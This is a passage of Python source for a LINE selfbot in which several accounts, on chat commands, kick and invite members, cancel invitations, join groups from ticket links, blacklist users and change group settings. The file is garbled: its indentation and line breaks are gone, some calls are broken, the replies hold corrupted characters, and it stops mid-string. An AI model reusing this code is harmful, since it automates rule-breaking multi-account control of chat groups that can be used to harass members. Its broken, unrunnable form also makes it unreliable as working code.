ki.acceptGroupInvitationByTicket(op.param1,Ti) kk.acceptGroupInvitationByTicket(op.param1,Ti) kc.acceptGroupInvitationByTicket(op.param1,Ti) G = kc.getGroup(op.param1) G.preventJoinByTicket = True kc.updateGroup(G) Ticket = kc.reissueGroupTicket(op.param1) if op.param2 in wait["blacklist"]: pass if op.param2 in wait["whitelist"]: pass else: wait["blacklist"][op.param2] = True if op.type == 13: if mid in op.param3: G = cl.getGroup(op.param1) if wait["autoJoin"] == True: if wait["autoCancel"]["on"] == True: if len(G.members) <= wait["autoCancel"]["members"]: cl.rejectGroupInvitation(op.param1) else: cl.acceptGroupInvitation(op.param1) else: cl.acceptGroupInvitation(op.param1) elif wait["autoCancel"]["on"] == True: if len(G.members) <= wait["autoCancel"]["members"]: cl.rejectGroupInvitation(op.param1) else: Inviter = op.param3.replace("",',') InviterX = Inviter.split(",") matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, InviterX) if matched_list == []: pass else: cl.cancelGroupInvitation(op.param1, matched_list) if op.type == 22: if wait["leaveRoom"] == True: cl.leaveRoom(op.param1) if op.type == 24: if wait["leaveRoom"] == True: cl.leaveRoom(op.param1) if op.type == 25: msg = op.message if msg.toType == 0: msg.to = msg.from_ if msg.from_ == profile.mid: if "join:" in msg.text: list_ = msg.text.split(":") try: cl.acceptGroupInvitationByTicket(list_[1],list_[2]) X = cl.getGroup(list_[1]) X.preventJoinByTicket = True cl.updateGroup(X) except: cl.sendText(msg.to,"error") if msg.toType == 1: if wait["leaveRoom"] == True: cl.leaveRoom(msg.to) if msg.contentType == 16: url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post") cl.like(url[25:58], url[66:], likeType=1001) if op.type == 25: msg = op.message if msg.contentType == 13: if wait["wblack"] == True: if msg.contentMetadata["mid"] in wait["commentBlack"]: cl.sendText(msg.to,"already") wait["wblack"] = False else: wait["commentBlack"][msg.contentMetadata["mid"]] = True wait["wblack"] = False cl.sendText(msg.to,"decided not to comment") elif wait["dblack"] == True: if msg.contentMetadata["mid"] in wait["commentBlack"]: del wait["commentBlack"][msg.contentMetadata["mid"]] cl.sendText(msg.to,"deleted") ki.sendText(msg.to,"deleted") kk.sendText(msg.to,"deleted") kc.sendText(msg.to,"deleted") wait["dblack"] = False else: wait["dblack"] = False cl.sendText(msg.to,"It is not in the black list") ki.sendText(msg.to,"It is not in the black list") kk.sendText(msg.to,"It is not in the black list") kc.sendText(msg.to,"It is not in the black list") elif wait["wblacklist"] == True: if msg.contentMetadata["mid"] in wait["blacklist"]: cl.sendText(msg.to,"already") ki.sendText(msg.to,"already") kk.sendText(msg.to,"already") kc.sendText(msg.to,"already") wait["wblacklist"] = False else: wait["blacklist"][msg.contentMetadata["mid"]] = True wait["wblacklist"] = False cl.sendText(msg.to,"aded") ki.sendText(msg.to,"aded") kk.sendText(msg.to,"aded") kc.sendText(msg.to,"aded") elif wait["dblacklist"] == True: if msg.contentMetadata["mid"] in wait["blacklist"]: del wait["blacklist"][msg.contentMetadata["mid"]] cl.sendText(msg.to,"deleted") ki.sendText(msg.to,"deleted") kk.sendText(msg.to,"deleted") kc.sendText(msg.to,"deleted") wait["dblacklist"] = False else: wait["dblacklist"] = False cl.sendText(msg.to,"It is not in the black list") ki.sendText(msg.to,"It is not in the black list") kk.sendText(msg.to,"It is not in the black list") kc.sendText(msg.to,"It is not in the black list") elif wait["contact"] == True: msg.contentType = 0 cl.sendText(msg.to,msg.contentMetadata["mid"]) if 'displayName' in msg.contentMetadata: contact = cl.getContact(msg.contentMetadata["mid"]) try: cu = cl.channel.getCover(msg.contentMetadata["mid"]) except: cu = "" cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu)) else: contact = cl.getContact(msg.contentMetadata["mid"]) try: cu = cl.channel.getCover(msg.contentMetadata["mid"]) except: cu = "" cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu)) elif msg.contentType == 16: if wait["timeline"] == True: msg.contentType = 0 if wait["lang"] == "JP": msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"] else: msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"] cl.sendText(msg.to,msg.text) elif msg.text is None: return elif msg.text in ["Key","help","Help"]: if msg.from_ in admin: if wait["lang"] == "JP": cl.sendText(msg.to,helpMessage) else: cl.sendText(msg.to,helpt) elif msg.text in ["Invite:on"]: if msg.from_ in admin: wait["winvite"] = True cl.sendText(msg.to,"send contact") elif ("Gn " in msg.text): if msg.from_ in admin: if msg.toType == 2: X = cl.getGroup(msg.to) X.name = msg.text.replace("Gn ","") cl.updateGroup(X) else: cl.sendText(msg.to,"It can't be used besides the group.") elif ("Cv1 gn " in msg.text): if msg.from_ in admin: if msg.toType == 2: X = cl.getGroup(msg.to) X.name = msg.text.replace("Cv1 gn ","") ki.updateGroup(X) else: ki.sendText(msg.to,"It can't be used besides the group.") elif ("Cv2 gn " in msg.text): if msg.from_ in admin: if msg.toType == 2: X = cl.getGroup(msg.to) X.name = msg.text.replace("Cv2 gn ","") kk.updateGroup(X) else: kk.sendText(msg.to,"It can't be used besides the group.") elif ("Cv3 gn " in msg.text): if msg.from_ in admin: if msg.toType == 2: X = cl.getGroup(msg.to) X.name = msg.text.replace("Cv3 gn ","") kc.updateGroup(X) else: kc.sendText(msg.to,"It can't be used besides the group.") elif "Kick " in msg.text: if msg.from_ in admin: midd = msg.text.replace("Kick ","") cl.kickoutFromGroup(msg.to,[midd]) elif "Cv1 kick " in msg.text: if msg.from_ in admin: midd = msg.text.replace("Cv1 kick ","") ki.kickoutFromGroup(msg.to,[midd]) elif "Cv2 kick " in msg.text: if msg.from_ in admin: midd = msg.text.replace("Cv2 kick ","") kk.kickoutFromGroup(msg.to,[midd]) elif "Cv3 kick " in msg.text: if msg.from_ in admin: midd = msg.text.replace("Cv3 kick ","") kc.kickoutFromGroup(msg.to,[midd]) elif "Invite " in msg.text: if msg.from_ in admin: midd = msg.text.replace("Invite ","") cl.findAndAddContactsByMid(midd) cl.inviteIntoGroup(msg.to,[midd]) elif "Cv1 invite " in msg.text: if msg.from_ in admin: midd = msg.text.replace("Cv1 invite ","") ki.findAndAddContactsByMid(midd) ki.inviteIntoGroup(msg.to,[midd]) elif "Cv2 invite " in msg.text: if msg.from_ in admin: midd = msg.text.replace("Cv2 invite ","") kk.findAndAddContactsByMid(midd) kk.inviteIntoGroup(msg.to,[midd]) elif "Cv3 invite " in msg.text: if msg.from_ in admin: midd = msg.text.replace("Cv3 invite ","") kc.findAndAddContactsByMid(midd) kc.inviteIntoGroup(msg.to,[midd]) elif msg.text in ["Me"]: if msg.from_ in admin: msg.contentType = 13 msg.contentMetadata = {'mid': mid} cl.sendMessage(msg) elif msg.text in ["Cv1"]: if msg.from_ in admin: msg.contentType = 13 msg.contentMetadata = {'mid': Amid} ki.sendMessage(msg) elif msg.text in ["Cv2"]: if msg.from_ in admin: msg.contentType = 13 msg.contentMetadata = {'mid': Bmid} kk.sendMessage(msg) elif msg.text in ["愛のプレゼント","Gift"]: if msg.from_ in admin: msg.contentType = 9 msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '5'} msg.text = None cl.sendMessage(msg) elif msg.text in ["愛のプレゼント","Cv1 gift"]: if msg.from_ in admin: msg.contentType = 9 msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'} msg.text = None ki.sendMessage(msg) elif msg.text in ["愛のプレゼント","Cv2 gift"]: if msg.from_ in admin: msg.contentType = 9 msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '8'} msg.text = None kk.sendMessage(msg) elif msg.text in ["愛のプレゼント","Cv3 gift"]: if msg.from_ in admin: msg.contentType = 9 msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '10'} msg.text = None kc.sendMessage(msg) elif msg.text in ["愛のプレゼント","All gift"]: if msg.from_ in admin: msg.contentType = 9 msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '12'} msg.text = None ki.sendMessage(msg) kk.sendMessage(msg) kc.sendMessage(msg) elif msg.text in ["cancel","Cancel"]: if msg.from_ in admin: if msg.toType == 2: X = cl.getGroup(msg.to) if X.invitee is not None: gInviMids = [contact.mid for contact in X.invitee] cl.cancelGroupInvitation(msg.to, gInviMids) else: if wait["lang"] == "JP": cl.sendText(msg.to,"No one is inviting") else: cl.sendText(msg.to,"Sorry, nobody absent") else: if wait["lang"] == "JP": cl.sendText(msg.to,"Can not be used outside the group") else: cl.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv cancel","Bot cancel"]: if msg.from_ in admin: if msg.toType == 2: G = k3.getGroup(msg.to) if G.invitee is not None: gInviMids = [contact.mid for contact in G.invitee] k3.cancelGroupInvitation(msg.to, gInviMids) else: if wait["lang"] == "JP": k3.sendText(msg.to,"No one is inviting") else: k3.sendText(msg.to,"Sorry, nobody absent") else: if wait["lang"] == "JP": k3.sendText(msg.to,"Can not be used outside the group") else: k3.sendText(msg.to,"Not for use less than group") #elif "gurl" == msg.text: #print cl.getGroup(msg.to) ##cl.sendMessage(msg) elif msg.text in ["Ourl","Link on","Urlon"]: if msg.from_ in admin: if msg.toType == 2: X = cl.getGroup(msg.to) X.preventJoinByTicket = False cl.updateGroup(X) if wait["lang"] == "JP": cl.sendText(msg.to,"Done") else: cl.sendText(msg.to,"already open") else: if wait["lang"] == "JP": cl.sendText(msg.to,"Can not be used outside the group") else: cl.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv1 ourl","Cv1 link on"]: if msg.from_ in admin: if msg.toType == 2: X = cl.getGroup(msg.to) X.preventJoinByTicket = False ki.updateGroup(X) if wait["lang"] == "JP": ki.sendText(msg.to,"Done Chivas") else: ki.sendText(msg.to,"already open") else: if wait["lang"] == "JP": cl.sendText(msg.to,"Can not be used outside the group") else: cl.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv2 ourl","Cv2 link on"]: if msg.from_ in admin: if msg.toType == 2: X = kk.getGroup(msg.to) X.preventJoinByTicket = False kk.updateGroup(X) if wait["lang"] == "JP": kk.sendText(msg.to,"Done Chivas") else: kk.sendText(msg.to,"already open") else: if wait["lang"] == "JP": kk.sendText(msg.to,"Can not be used outside the group") else: kk.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv3 ourl","Cv3 link on"]: if msg.from_ in admin: if msg.toType == 2: X = kc.getGroup(msg.to) X.preventJoinByTicket = False kc.updateGroup(X) if wait["lang"] == "JP": kc.sendText(msg.to,"Done Chivas") else: kc.sendText(msg.to,"already open") else: if wait["lang"] == "JP": kc.sendText(msg.to,"Can not be used outside the group") else: kc.sendText(msg.to,"Not for use less than group") elif msg.text in ["Curl","Link off","Urloff"]: if msg.from_ in admin: if msg.toType == 2: X = cl.getGroup(msg.to) X.preventJoinByTicket = True cl.updateGroup(X) if wait["lang"] == "JP": cl.sendText(msg.to,"Done") else: cl.sendText(msg.to,"already close") else: if wait["lang"] == "JP": cl.sendText(msg.to,"Can not be used outside the group") else: cl.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv1 curl","Cv1 link off"]: if msg.from_ in admin: if msg.toType == 2: X = ki.getGroup(msg.to) X.preventJoinByTicket = True ki.updateGroup(X) if wait["lang"] == "JP": ki.sendText(msg.to,"Done Chivas") else: ki.sendText(msg.to,"already close") else: if wait["lang"] == "JP": ki.sendText(msg.to,"Can not be used outside the group") else: ki.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv2 curl","Cv2 link off"]: if msg.from_ in admin: if msg.toType == 2: X = kk.getGroup(msg.to) X.preventJoinByTicket = True kk.updateGroup(X) if wait["lang"] == "JP": kk.sendText(msg.to,"Done Chivas") else: kk.sendText(msg.to,"already close") else: if wait["lang"] == "JP": kk.sendText(msg.to,"Can not be used outside the group") else: kk.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv3 curl","Cv3 link off"]: if msg.from_ in admin: if msg.toType == 2: X = kc.getGroup(msg.to) X.preventJoinByTicket = True kc.updateGroup(X) if wait["lang"] == "JP": kc.sendText(msg.to,"Done Chivas") else: kc.sendText(msg.to,"already close") else: if wait["lang"] == "JP": kc.sendText(msg.to,"Can not be used outside the group") else: kc.sendText(msg.to,"Not for use less than group") elif "jointicket " in msg.text.lower(): rplace=msg.text.lower().replace("jointicket ") if rplace == "on": wait["atjointicket"]=True elif rplace == "off": wait["atjointicket"]=False cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"])) elif '/ti/g/' in msg.text.lower(): link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?') links = link_re.findall(msg.text) n_links=[] for l in links: if l not in n_links: n_links.append(l) for ticket_id in n_links: if wait["atjointicket"] == True: group=cl.findGroupByTicket(ticket_id) cl.acceptGroupInvitationByTicket(group.mid,ticket_id) cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name)) elif msg.text == "Ginfo": if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: gCreator = ginfo.creator.displayName except: gCreator = "Error" if wait["lang"] == "JP": if ginfo.invitee is None: sinvitee = "0" else: sinvitee = str(len(ginfo.invitee)) if ginfo.preventJoinByTicket == True: u = "close" else: u = "open" cl.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\nmembers:" + str(len(ginfo.members)) + "members\npending:" + sinvitee + "people\nURL:" + u + "it is inside") else: cl.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus) else: if wait["lang"] == "JP": cl.sendText(msg.to,"Can not be used outside the group") else: cl.sendText(msg.to,"Not for use less than group") elif "Id" == msg.text: if msg.from_ in admin: cl.sendText(msg.to,msg.to) elif "All mid" == msg.text: if msg.from_ in admin: cl.sendText(msg.to,mid) ki.sendText(msg.to,Amid) kk.sendText(msg.to,Bmid) kc.sendText(msg.to,Cmid) elif "Mid" == msg.text: if msg.from_ in admin: cl.sendText(msg.to,mid) elif "Cv1 mid" == msg.text: if msg.from_ in admin: ki.sendText(msg.to,Amid) elif "Cv2 mid" == msg.text: if msg.from_ in admin: kk.sendText(msg.to,Bmid) elif "Cv3 mid" == msg.text: if msg.from_ in admin: kc.sendText(msg.to,Cmid) elif msg.text in ["Wkwk"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { "STKID": "100", "STKPKGID": "1", "STKVER": "100" } ki.sendMessage(msg) kk.sendMessage(msg) elif msg.text in ["Hehehe"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { "STKID": "10", "STKPKGID": "1", "STKVER": "100" } ki.sendMessage(msg) kk.sendMessage(msg) elif msg.text in ["Galon"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { "STKID": "9", "STKPKGID": "1", "STKVER": "100" } ki.sendMessage(msg) kk.sendMessage(msg) elif msg.text in ["You"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { "STKID": "7", "STKPKGID": "1", "STKVER": "100" } ki.sendMessage(msg) kk.sendMessage(msg) elif msg.text in ["Hadeuh"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { "STKID": "6", "STKPKGID": "1", "STKVER": "100" } ki.sendMessage(msg) kk.sendMessage(msg) elif msg.text in ["Please"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { "STKID": "4", "STKPKGID": "1", "STKVER": "100" } ki.sendMessage(msg) kk.sendMessage(msg) elif msg.text in ["Haaa"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { "STKID": "3", "STKPKGID": "1", "STKVER": "100" } ki.sendMessage(msg) kk.sendMessage(msg) elif msg.text in ["Lol"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { "STKID": "110", "STKPKGID": "1", "STKVER": "100" } ki.sendMessage(msg) kk.sendMessage(msg) elif msg.text in ["Hmmm"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { "STKID": "101", "STKPKGID": "1", "STKVER": "100" } ki.sendMessage(msg) elif msg.text in ["Wc"]: if msg.from_ in admin: msg.contentType = 7 msg.text = None msg.contentMetadata = { "STKID": "247", "STKPKGID": "3", "STKVER": "100" } ki.sendMessage(msg) kk.sendMessage(msg) elif msg.text in ["TL:"]: if msg.from_ in admin: tl_text = msg.text.replace("TL:","") cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"]) elif msg.text in ["Cn "]: if msg.from_ in admin: string = msg.text.replace("Cn ","") if len(string.decode('utf-8')) <= 20: profile = cl.getProfile() profile.displayName = string cl.updateProfile(profile) cl.sendText(msg.to,"name " + string + " done") elif msg.text in ["Cv1 rename "]: if msg.from_ in admin: string = msg.text.replace("Cv1 rename ","") if len(string.decode('utf-8')) <= 20: profile_B = ki.getProfile() profile_B.displayName = string ki.updateProfile(profile_B) ki.sendText(msg.to,"name " + string + " done") elif msg.text in ["Cv2 rename "]: if msg.from_ in admin: string = msg.text.replace("Cv2 rename ","") if len(string.decode('utf-8')) <= 20: profile_B = kk.getProfile() profile_B.displayName = string kk.updateProfile(profile_B) kk.sendText(msg.to,"name " + string + " done") elif msg.text in ["Mc "]: if msg.from_ in admin: mmid = msg.text.replace("Mc ","") msg.contentType = 13 msg.contentMetadata = {"mid":mmid} cl.sendMessage(msg) elif msg.text in ["連絡先:オン","K on","Contact on","顯示:開"]: if msg.from_ in admin: if wait["contact"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"already on") else: cl.sendText(msg.to,"done") else: wait["contact"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"already on") else: cl.sendText(msg.to,"done") elif msg.text in ["連絡先:オフ","K off","Contact off","顯示:關"]: if msg.from_ in admin: if wait["contact"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"already off") else: cl.sendText(msg.to,"done ") else: wait["contact"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"already off") else: cl.sendText(msg.to,"done") elif msg.text.lower() == 'protect on': if wait["protect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah on 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈") else: wait["protect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"already ON􀜁􀇔􏿿") else: cl.sendText(msg.to,"It is already On ô€¨") elif msg.text.lower() == 'qrprotect on': if wait["linkprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah on 􀜁􀇔��👈") else: cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈") else: wait["linkprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"already ON􀜁􀇔􏿿") else: cl.sendText(msg.to,"It is already On ô€¨") elif msg.text.lower() == 'inviteprotect on': if wait["inviteprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah on 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨����👈") else: wait["inviteprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"already ON􀜁􀇔􏿿") else: cl.sendText(msg.to,"It is already On ô€¨") elif msg.text.lower() == 'cancelprotect on': if wait["cancelprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah on 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈") else: wait["cancelprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"already ON􀜁􀇔􏿿") else: cl.sendText(msg.to,"It is already On ô€¨") elif msg.text.lower() == 'auto join on': if wait["autoJoin"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah off 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈") else: wait["autoJoin"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"already ON􀜁􀇔􏿿") else: cl.sendText(msg.to,"It is already On ô€¨") elif msg.text.lower() == 'blocklist': blockedlist = cl.getBlockedContactIds() cl.sendText(msg.to, "Please wait...") kontak = cl.getContacts(blockedlist) num=1 msgs="User Blocked List\n" for ids in kontak: msgs+="\n%i. %s" % (num, ids.displayName) num=(num+1) msgs+="\n\nTotal %i blocked user(s)" % len(kontak) cl.sendText(msg.to, msgs) elif msg.text in ["Allprotect on","Panick:on"]: if msg.from_ in admin: if wait["inviteprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah on 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Already on") else: wait["inviteprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Protect invite on 􀜁􀇔􏿿") if wait["cancelprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah on 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Already on") else: wait["cancelprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Protect cancel on 􀜁􀇔􏿿") if wait["protect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah on 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Already on") else: wait["protect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Protect on 􀜁􀇔􏿿") else: cl.sendText(msg.to,"Already on") if wait["linkprotect"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah on 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Already on") else: wait["linkprotect"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Protect QR on 􀜁􀇔􏿿") else: cl.sendText(msg.to,"Already on") elif msg.text in ["Allprotect off","Panick:off"]: if msg.from_ in admin: if wait["inviteprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah off 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Already off") else: wait["inviteprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protect invite off 􀜁􀇔􏿿") if wait["cancelprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah off 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Already off") else: wait["cancelprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protect cancel off 􀜁􀇔􏿿") if wait["protect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah off 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Already off") else: wait["protect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protect off 􀜁􀇔􏿿") else: cl.sendText(msg.to,"Already off") if wait["linkprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah off 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Already off") else: wait["linkprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protect QR off 􀜁􀇔􏿿") else: cl.sendText(msg.to,"Already off") elif msg.text.lower() == 'auto join off': if wait["autoJoin"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Auto Join Already Off") else: cl.sendText(msg.to,"Auto Join set off") else: wait["autoJoin"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"already close") else: cl.sendText(msg.to,"It is already open ô€œ👈") elif msg.text in ["Protect off"]: if wait["protect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"hall ini sudah off ô€œ👈") else: cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈") else: wait["protect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"already close") else: cl.sendText(msg.to,"It is already open ô€œ👈") elif msg.text in ["Qrprotect off","qrprotect off"]: if wait["linkprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"hall ini sudah off ô€œ👈") else: cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈") else: wait["linkprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"already close") else: cl.sendText(msg.to,"It is already open ô€œ👈") elif msg.text in ["Inviteprotect off"]: if wait["inviteprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"hall ini sudah off ô€œ👈") else: cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈") else: wait["inviteprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"already close") else: cl.sendText(msg.to,"It is already open ô€œ👈") elif msg.text in ["Cancelprotect off"]: if wait["cancelprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"hall ini sudah off ô€œ👈") else: cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈") else: wait["cancelprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"already close") else: cl.sendText(msg.to,"It is already open ô€œ👈") elif "Group cancel:" in msg.text: try: strnum = msg.text.replace("Group cancel:","") if strnum == "off": wait["autoCancel"]["on"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Itu off undangan ditolak👈\nSilakan kirim dengan menentukan jumlah orang ketika Anda menghidupkan👈") else: cl.sendText(msg.to,"Off undangan ditolak👈Sebutkan jumlah terbuka ketika Anda ingin mengirim") else: num = int(strnum) wait["autoCancel"]["on"] = True if wait["lang"] == "JP": cl.sendText(msg.to,strnum + "Kelompok berikut yang diundang akan ditolak secara otomatis👈") else: cl.sendText(msg.to,strnum + "The team declined to create the following automatic invitation") except: if wait["lang"] == "JP": kk.sendText(msg.to,"Nilai tidak benar👈") else: cl.sendText(msg.to,"Weird value🛡") elif msg.text in ["Auto leave on","Auto leave: on"]: if wait["leaveRoom"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"on👈􀜁􀇔􏿿") else: cl.sendText(msg.to,"Sudah terbuka 􀜁􀇔􏿿") else: wait["leaveRoom"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Done👈􀜁􀇔􏿿") else: cl.sendText(msg.to,"Is already open👈􀜁􀇔􏿿") elif msg.text in ["Auto leave off","Auto leave: off"]: if wait["leaveRoom"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"on👈􀜁􀇔􏿿") else: cl.sendText(msg.to,"Sudah off👈􀜁􀇔􏿿") else: wait["leaveRoom"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Done👈􀜁􀇔􏿿") else: cl.sendText(msg.to,"Is already close👈􀜁􀇔􏿿") elif msg.text in ["Share on","share on"]: if wait["timeline"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Done 􀜁􀇔􏿿") else: cl.sendText(msg.to,"Hal ini sudah terbuka👈") else: wait["timeline"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"on👈") else: cl.sendText(msg.to,"on👈") elif msg.text in ["Share off","share off"]: if wait["timeline"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Done👈􀜁􀇔􏿿") else: cl.sendText(msg.to,"It is already turned off 􀜁􀇔􏿿👈") else: wait["timeline"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Off👈") else: cl.sendText(msg.to,"Off👈") elif msg.text.lower() == 'set': md = "" if wait["contact"] == True: md+="􀜁􀇔􏿿 Contact:on 􀜁􀄯􏿿\n" else: md+="􀜁􀇔􏿿 Contact:off􀜁􀄰􏿿\n" if wait["autoJoin"] == True: md+="􀜁􀇔􏿿 Auto Join:on 􀜁􀄯􏿿\n" else: md+="􀜁􀇔􏿿 Auto Join:off􀜁􀄰􏿿\n" if wait["autoCancel"]["on"] == True:md+="􀜁􀇔􏿿 Auto cancel:" + str(wait["autoCancel"]["members"]) + "􀜁􀄯􏿿\n" else: md+="􀜁􀇔􏿿 Group cancel:off 􀜁􀄰􏿿\n" if wait["leaveRoom"] == True: md+="􀜁􀇔􏿿 Auto leave:on 􀜁􀄯􏿿\n" else: md+="􀜁􀇔􏿿 Auto leave:off 􀜁􀄰􏿿\n" if wait["timeline"] == True: md+="􀜁􀇔􏿿 share:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 Share:off 􀜁􀄰􏿿\n" if wait["autoAdd"] == True: md+="􀜁􀇔􏿿 Auto add:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 Auto add:off 􀜁􀄰􏿿\n" if wait["commentOn"] == True: md+="􀜁􀇔􏿿 Auto komentar:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 Auto komentar:off 􀜁􀄰􏿿\n" if wait["protect"] == True: md+="􀜁􀇔􏿿 Protect:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 Protect:off 􀜁􀄰􏿿\n" if wait["linkprotect"] == True: md+="􀜁􀇔􏿿 Link Protect:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 Link Protect:off 􀜁􀄰􏿿\n" if wait["inviteprotect"] == True: md+="􀜁􀇔􏿿 Invitation 